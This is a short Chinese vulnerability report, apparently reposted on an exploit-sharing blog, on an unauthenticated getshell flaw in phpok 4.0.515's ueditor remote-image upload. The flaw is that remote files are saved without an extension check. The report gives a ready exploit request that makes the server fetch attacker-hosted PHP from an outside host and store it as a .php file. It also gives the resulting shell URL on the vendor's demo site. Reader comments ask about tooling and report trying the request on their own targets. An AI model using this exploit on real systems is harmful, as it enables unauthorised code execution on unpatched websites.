phpok通杀前台getshell 4.0.515官方demo测试成功

漏洞作者: 索马里的海贼

简要描述:

无任何限制,不用注册账号,不用csrf,不用注入。一个请求直接getshell。
不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题

详细说明:

/framework/www/ueditor_control.php行61

remote_image_f函数没对远程文件后缀做检查直接保存到本地

这个真心没什么好分析的我就不贴代码分析了

漏洞证明:

构造请求

/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php

我这里1.txt的内容是
<?php phpinfo();?>

测试问题嘛 不做破坏

0116020686c16e632111045598208f643379cf17

shell地址直接返回了。这里不返回也没事,文件名可以自己算出来。
http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php

01160315043f5872a131fa848c769c26ad486869

11 条评论

  1. 冷笑话

    不错的站,支持下留个名!!!

  2. tjkk

    那个是什么工具

    1. 0day5
      @tjkk

      火狐上的hackbar插件

  3. black angle

    那个返回地址怎么算呢~

    1. 0day5
      @black angle

      仔细看文章,有py脚本给出的

      1. 随风
        @0day5

        构造请求

        那个是什么工具

        1. 0day5
          @随风

          火狐上的hackbar插件

  4. 明天的风

    老大,为什么我测试的都提示:error: file ueditor.php no exists!

    1. 0day5
      @明天的风

      这个一般都是补上了,本人有测试成功的~

      1. 活在当下
        @0day5

        旧版本的可以测试成功吗?

        1. 0day5
          @活在当下

          应该可以的,我没有测试

发表评论